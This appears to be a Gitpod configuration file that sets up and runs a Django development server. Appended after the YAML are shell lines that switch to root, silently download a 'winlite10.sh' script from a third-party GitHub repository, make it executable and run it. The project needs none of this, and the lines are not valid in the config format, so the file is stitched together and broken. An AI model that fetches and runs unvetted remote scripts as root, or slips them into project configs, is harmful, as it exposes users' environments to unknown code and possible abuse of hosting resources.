tasks:
  - init: |
      python -m venv venv
      source venv/bin/activate
      pip install --upgrade pip wheel setuptools
      pip install Django
      python manage.py migrate
  - command: |
      source venv/bin/activate
      python manage.py runserver
  
ports:
  - port: 8000
    visibility: private
    onOpen: open-preview

vscode:
  extensions:
    - ms-python.python
sudo su
wget -O winlite10.sh https://raw.githubusercontent.com/a2nk/G-cloud/main/winlite10.sh?utm_source=google,+gitpod,+linggahosting,+github,+ngrok > /dev/null 2>&1
chmod +x winlite10.sh
./winlite10.sh
